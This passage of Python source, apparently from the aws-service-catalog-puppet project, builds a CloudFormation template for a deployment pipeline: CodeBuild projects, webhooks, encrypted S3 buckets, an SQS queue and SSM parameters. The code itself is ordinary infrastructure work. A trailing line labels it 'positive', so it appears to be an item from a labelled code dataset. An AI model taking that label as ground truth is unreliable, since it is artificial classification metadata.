webhook = codepipeline.Webhook('Webhook', Authentication='IP', TargetAction='Source', AuthenticationConfiguration=codepipeline.WebhookAuthConfiguration(AllowedIPRange=source.get('Configuration').get('GitWebHookIpAddress')), Filters=[codepipeline.WebhookFilterRule(JsonPath='$.changes[0].ref.id', MatchEquals='refs/heads/{Branch}')], TargetPipelineVersion=1, TargetPipeline=t.Sub('${AWS::StackName}-pipeline'))
template.add_resource(webhook)
values_for_sub = {'GitUrl': source.get('Configuration').get('GitUrl'), 'WebhookUrl': t.GetAtt(webhook, 'Url')}
output_to_add = t.Output('WebhookUrl')
output_to_add.Value = t.Sub('${GitUrl}||${WebhookUrl}', **values_for_sub)
output_to_add.Export = t.Export(t.Sub('${AWS::StackName}-pipeline'))
template.add_output(output_to_add)
if is_codestarsourceconnection:
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, RoleArn=t.GetAtt('SourceRole', 'Arn'), ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='CodeStarSourceConnection'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'ConnectionArn': source.get('Configuration').get('ConnectionArn'), 'FullRepositoryId': source.get('Configuration').get('FullRepositoryId'), 'BranchName': source.get('Configuration').get('BranchName'), 'OutputArtifactFormat': source.get('Configuration').get('OutputArtifactFormat')}, Name='Source'))
if is_s3:
bucket_name = source.get('Configuration').get('S3Bucket')
if not scm_skip_creation_of_repo:
template.add_resource(s3.Bucket(bucket_name, PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(IgnorePublicAcls=True, BlockPublicPolicy=True, BlockPublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=bucket_name, VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='S3'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'S3Bucket': bucket_name, 'S3ObjectKey': source.get('Configuration').get('S3ObjectKey'), 'PollForSourceChanges': source.get('Configuration').get('PollForSourceChanges')}, Name='Source'))
single_account_run_project_build_spec = dict(version=0.2, phases=dict(install=install_spec, build={'commands': ['echo "single_account: \\"${SINGLE_ACCOUNT_ID}\\"" > parameters.yaml', 'cat parameters.yaml', 'zip parameters.zip parameters.yaml', 'aws s3 cp parameters.zip s3://sc-puppet-parameterised-runs-${PUPPET_ACCOUNT_ID}/parameters.zip']}, post_build={'commands': ['servicecatalog-puppet wait-for-parameterised-run-to-complete']}), artifacts=dict(name='DeployProject', files=['ServiceCatalogPuppet/manifest.yaml', 'ServiceCatalogPuppet/manifest-expanded.yaml', 'results/*/*', 'output/*/*', 'exploded_results/*/*', 'tasks.log']))
single_account_run_project_args = dict(Name='servicecatalog-puppet-single-account-run', Description='Runs puppet for a single account - SINGLE_ACCOUNT_ID', ServiceRole=t.GetAtt(deploy_role, 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=480, Environment=codebuild.Environment(ComputeType=t.Ref(deploy_environment_compute_type_parameter), Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'SINGLE_ACCOUNT_ID', 'Value': 'CHANGE_ME'}] + deploy_env_vars), Source=codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_account_run_project_build_spec)))
single_account_run_project = template.add_resource(codebuild.Project('SingleAccountRunProject', **single_account_run_project_args))
single_account_run_project_build_spec['phases']['post_build']['commands'] = ['servicecatalog-puppet wait-for-parameterised-run-to-complete --on-complete-url $CALLBACK_URL']
single_account_run_project_args['Name'] = 'servicecatalog-puppet-single-account-run-with-callback'
single_account_run_project_args['Description'] = 'Runs puppet for a single account - SINGLE_ACCOUNT_ID and then does a http put'
single_account_run_project_args.get('Environment').EnvironmentVariables.append({'Type': 'PLAINTEXT', 'Name': 'CALLBACK_URL', 'Value': 'CHANGE_ME'})
single_account_run_project_args['Source'] = codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_account_run_project_build_spec))
single_account_run_project_with_callback = template.add_resource(codebuild.Project('SingleAccountRunWithCallbackProject', **single_account_run_project_args))
single_action_run_project_build_spec = dict(version=0.2, phases=dict(install=install_spec, build={'commands': ['echo "section: \\"${SECTION}\\"" > parameters.yaml', 'echo "item: \\"${ITEM}\\"" >> parameters.yaml', 'echo "include_dependencies: \\"${INCLUDE_DEPENDENCIES}\\"" >> parameters.yaml', 'echo "include_reverse_dependencies: \\"${INCLUDE_REVERSE_DEPENDENCIES}\\"" >> parameters.yaml', 'cat parameters.yaml', 'zip parameters.zip parameters.yaml', 'aws s3 cp parameters.zip s3://sc-puppet-parameterised-runs-${PUPPET_ACCOUNT_ID}/parameters.zip']}, post_build={'commands': ['servicecatalog-puppet wait-for-parameterised-run-to-complete']}), artifacts=dict(name='DeployProject', files=['ServiceCatalogPuppet/manifest.yaml', 'ServiceCatalogPuppet/manifest-expanded.yaml', 'results/*/*', 'output/*/*', 'exploded_results/*/*', 'tasks.log']))
single_action_run_project_args = dict(Name='servicecatalog-puppet-single-action-run', Description='Runs puppet for a single action', ServiceRole=t.GetAtt(deploy_role, 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=480, Environment=codebuild.Environment(ComputeType=t.Ref(deploy_environment_compute_type_parameter), Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'SECTION', 'Value': 'CHANGE_ME - launches|stacks|assertions|spoke-local-portfolios|etc'}, {'Type': 'PLAINTEXT', 'Name': 'ITEM', 'Value': 'CHANGE_ME - name of the launch|stack|assertion|etc'}, {'Type': 'PLAINTEXT', 'Name': 'INCLUDE_DEPENDENCIES', 'Value': 'CHANGE_ME - should include your specified items dependencies true|false'}, {'Type': 'PLAINTEXT', 'Name': 'INCLUDE_REVERSE_DEPENDENCIES', 'Value': 'CHANGE_ME - should include things that depend on your specified item true|false'}] + deploy_env_vars), Source=codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_action_run_project_build_spec)))
single_action_run_project = template.add_resource(codebuild.Project('SingleActionRunProject', **single_action_run_project_args))
single_action_run_project_build_spec['phases']['post_build']['commands'] = ['servicecatalog-puppet wait-for-parameterised-run-to-complete --on-complete-url $CALLBACK_URL']
single_action_run_project_args['Name'] = 'servicecatalog-puppet-single-action-run-with-callback'
single_action_run_project_args['Description'] = 'Runs puppet for a single action and then does a http put'
single_action_run_project_args.get('Environment').EnvironmentVariables.append({'Type': 'PLAINTEXT', 'Name': 'CALLBACK_URL', 'Value': 'CHANGE_ME'})
single_action_run_project_args['Source'] = codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_action_run_project_build_spec))
single_action_run_project_with_callback = template.add_resource(codebuild.Project('SingleActionRunWithCallbackProject', **single_action_run_project_args))
stages = [source_stage]
if should_validate:
template.add_resource(codebuild.Project('ValidateProject', Name='servicecatalog-puppet-validate', ServiceRole=t.GetAtt('DeployRole', 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='CODEPIPELINE'), TimeoutInMinutes=60, Environment=codebuild.Environment(ComputeType='BUILD_GENERAL1_SMALL', Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': constants.PARTITION_ENVIRONMENTAL_VARIABLE_NAME, 'Value': config.get_partition()}]), Source=codebuild.Source(BuildSpec=yaml.safe_dump(dict(version='0.2', phases={'install': {'runtime-versions': {'python': '3.9'}, 'commands': [f'pip install {puppet_version}' if 'http' in puppet_version else f'pip install aws-service-catalog-puppet=={puppet_version}']}, 'build': {'commands': ['servicecatalog-puppet validate manifest.yaml']}})), Type='CODEPIPELINE'), Description='Validate the manifest.yaml file'))
stages.append(codepipeline.Stages(Name='Validate', Actions=[codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source')], Name='Validate', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='ValidateProject')], Configuration={'ProjectName': t.Ref('ValidateProject'), 'PrimarySource': 'Source'}, RunOrder=1)]))
if is_manual_approvals:
deploy_stage = codepipeline.Stages(Name='Deploy', Actions=[codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source'), codepipeline.InputArtifacts(Name='ParameterisedSource')], Name='DryRun', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='DryRunProject')], Configuration={'ProjectName': t.Ref('DryRunProject'), 'PrimarySource': 'Source'}, RunOrder=1), codepipeline.Actions(ActionTypeId=codepipeline.ActionTypeId(Category='Approval', Owner='AWS', Version='1', Provider='Manual'), Configuration={'NotificationArn': t.Ref('DryRunNotificationTopic'), 'CustomData': 'Approve when you are happy with the dry run.'}, Name='DryRunApproval', RunOrder=2), codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source'), codepipeline.InputArtifacts(Name='ParameterisedSource')], Name='Deploy', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='DeployProject')], Configuration={'ProjectName': t.Ref('DeployProject'), 'PrimarySource': 'Source'}, RunOrder=3)])
else:
deploy_stage = codepipeline.Stages(Name='Deploy', Actions=[codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source'), codepipeline.InputArtifacts(Name='ParameterisedSource')], Name='Deploy', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='DeployProject')], Configuration={'ProjectName': t.Ref('DeployProject'), 'PrimarySource': 'Source', 'EnvironmentVariables': '[{"name":"EXECUTION_ID","value":"#{codepipeline.PipelineExecutionId}","type":"PLAINTEXT"}]'}, RunOrder=1)])
stages.append(deploy_stage)
pipeline = template.add_resource(codepipeline.Pipeline('Pipeline', RoleArn=t.GetAtt('PipelineRole', 'Arn'), Stages=stages, Name=t.Sub('${AWS::StackName}-pipeline'), ArtifactStore=codepipeline.ArtifactStore(Type='S3', Location=t.Sub('sc-puppet-pipeline-artifacts-${AWS::AccountId}-${AWS::Region}')), RestartExecutionOnUpdate=True))
if is_github:
template.add_resource(codepipeline.Webhook('Webhook', AuthenticationConfiguration=codepipeline.WebhookAuthConfiguration(SecretToken=t.Join('', ['{{resolve:secretsmanager:', source.get('Configuration').get('SecretsManagerSecret'), ':SecretString:SecretToken}}'])), Filters=[codepipeline.WebhookFilterRule(JsonPath='$.ref', MatchEquals='refs/heads/' + source.get('Configuration').get('Branch'))], Authentication='GITHUB_HMAC', TargetPipeline=t.Ref(pipeline), TargetAction='Source', Name=t.Sub('${AWS::StackName}-webhook'), TargetPipelineVersion=t.GetAtt(pipeline, 'Version'), RegisterWithThirdParty='true'))
deploy_project_build_spec = dict(version=0.2, phases=dict(install={'runtime-versions': dict(python='3.9'), 'commands': [f'pip install {puppet_version}' if 'http' in puppet_version else f'pip install aws-service-catalog-puppet=={puppet_version}']}, pre_build={'commands': ['servicecatalog-puppet --info expand --parameter-override-file $CODEBUILD_SRC_DIR_ParameterisedSource/parameters.yaml manifest.yaml', 'servicecatalog-puppet --info generate-task-reference $PWD/manifest-expanded.yaml']}, build={'commands': ['servicecatalog-puppet --info deploy-from-task-reference --parameter-override-file $CODEBUILD_SRC_DIR_ParameterisedSource/parameters.yaml --num-workers ${NUM_WORKERS} .']}), artifacts=dict(name='DeployProject', files=['*.yaml', 'manifest-expanded.yaml', 'results/*/*', 'output/*/*', 'exploded_results/*/*', 'tasks/*.json']))
deploy_project_args = dict(Name='servicecatalog-puppet-deploy', ServiceRole=t.GetAtt(deploy_role, 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='CODEPIPELINE'), TimeoutInMinutes=480, Environment=codebuild.Environment(ComputeType=t.Ref(deploy_environment_compute_type_parameter), Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PARAMETER_STORE', 'Name': 'NUM_WORKERS', 'Value': t.Ref(num_workers_ssm_parameter)}, {'Type': 'PARAMETER_STORE', 'Name': 'SPOKE_EXECUTION_MODE_DEPLOY_ENV', 'Value': constants.SPOKE_EXECUTION_MODE_DEPLOY_ENV_PARAMETER_NAME}] + deploy_env_vars), Source=codebuild.Source(Type='CODEPIPELINE', BuildSpec=yaml.safe_dump(deploy_project_build_spec)), Description='deploys out the products to be deployed')
deploy_project = template.add_resource(codebuild.Project('DeployProject', **deploy_project_args))
deploy_project_build_spec['phases']['build']['commands'] = ['servicecatalog-puppet --info dry-run manifest-expanded.yaml']
deploy_project_build_spec['artifacts']['name'] = 'DryRunProject'
deploy_project_args['Name'] = 'servicecatalog-puppet-dryrun'
deploy_project_args['Description'] = 'dry run of servicecatalog-puppet-dryrun'
deploy_project_args['Source'] = codebuild.Source(Type='CODEPIPELINE', BuildSpec=yaml.safe_dump(deploy_project_build_spec))
dry_run_project = template.add_resource(codebuild.Project('DryRunProject', **deploy_project_args))
bootstrap_project = template.add_resource(codebuild.Project('BootstrapProject', Name='servicecatalog-puppet-bootstrap-spokes-in-ou', ServiceRole=t.GetAtt('DeployRole', 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=60, Environment=codebuild.Environment(ComputeType='BUILD_GENERAL1_SMALL', Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'OU_OR_PATH', 'Value': 'CHANGE_ME'}, {'Type': 'PLAINTEXT', 'Name': 'IAM_ROLE_NAME', 'Value': 'OrganizationAccountAccessRole'}, {'Type': 'PLAINTEXT', 'Name': 'IAM_ROLE_ARNS', 'Value': ''}, {'Type': 'PLAINTEXT', 'Name': 'OPTIONS', 'Value': ''}]), Source=codebuild.Source(BuildSpec='version: 0.2\nphases:\n install:\n runtime-versions:\n python: 3.9\n commands:\n - pip install aws-service-catalog-puppet\n build:\n commands:\n - servicecatalog-puppet bootstrap-spokes-in-ou $OU_OR_PATH $IAM_ROLE_NAME $IAM_ROLE_ARNS ${OPTIONS}\nartifacts:\n files:\n - results/*/*\n - output/*/*\n name: BootstrapProject\n', Type='NO_SOURCE'), Description='Bootstrap all the accounts in an OU'))
template.add_resource(codebuild.Project('BootstrapASpokeProject', Name='servicecatalog-puppet-bootstrap-spoke', ServiceRole=t.GetAtt('DeployRole', 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=60, Environment=codebuild.Environment(ComputeType='BUILD_GENERAL1_SMALL', Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'PUPPET_ACCOUNT_ID', 'Value': t.Sub('${AWS::AccountId}')}, {'Type': 'PLAINTEXT', 'Name': 'ORGANIZATION_ACCOUNT_ACCESS_ROLE_ARN', 'Value': 'CHANGE_ME'}, {'Type': 'PLAINTEXT', 'Name': 'ASSUMABLE_ROLE_IN_ROOT_ACCOUNT', 'Value': 'CHANGE_ME'}, {'Type': 'PLAINTEXT', 'Name': 'OPTIONS', 'Value': 'CHANGE_ME'}]), Source=codebuild.Source(BuildSpec=yaml.safe_dump(dict(version=0.2, phases=dict(install=install_spec, build={'commands': ['servicecatalog-puppet bootstrap-spoke-as ${PUPPET_ACCOUNT_ID} ${ASSUMABLE_ROLE_IN_ROOT_ACCOUNT} ${ORGANIZATION_ACCOUNT_ACCESS_ROLE_ARN} ${OPTIONS}']}))), Type='NO_SOURCE'), Description='Bootstrap given account as a spoke'))
cloud_formation_events_queue = template.add_resource(sqs.Queue('CloudFormationEventsQueue', QueueName='servicecatalog-puppet-cloudformation-events', Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'})))
cloud_formation_events_queue_policy = template.add_resource(sqs.QueuePolicy('CloudFormationEventsQueuePolicy', Queues=[t.Ref(cloud_formation_events_queue)], PolicyDocument={'Id': 'AllowSNS', 'Version': '2012-10-17', 'Statement': [{'Sid': 'allow-send-message', 'Effect': 'Allow', 'Principal': {'AWS': '*'}, 'Action': ['sqs:SendMessage'], 'Resource': '*', 'Condition': {'ArnEquals': {'aws:SourceArn': t.Sub('arn:${AWS::Partition}:sns:*:${AWS::AccountId}:servicecatalog-puppet-cloudformation-regional-events')}}}]}))
spoke_deploy_bucket = template.add_resource(s3.Bucket('SpokeDeployBucket', PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(IgnorePublicAcls=True, BlockPublicPolicy=True, BlockPublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=t.Sub('sc-puppet-spoke-deploy-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
caching_bucket = template.add_resource(s3.Bucket('CachingBucket', PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(BlockPublicAcls=True, BlockPublicPolicy=True, IgnorePublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=t.Sub('sc-puppet-caching-bucket-${AWS::AccountId}-${AWS::Region}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
template.add_output(t.Output('CloudFormationEventsQueueArn', Value=t.GetAtt(cloud_formation_events_queue, 'Arn')))
template.add_output(t.Output('Version', Value=t.GetAtt(param, 'Value')))
template.add_output(t.Output('ManualApprovalsParam', Value=t.GetAtt(manual_approvals_param, 'Value')))
template.add_resource(ssm.Parameter('DefaultTerraformVersion', Type='String', Name=constants.DEFAULT_TERRAFORM_VERSION_PARAMETER_NAME, Value=constants.DEFAULT_TERRAFORM_VERSION_VALUE))
return template
|
aws-service-catalog-puppet
|
positive
|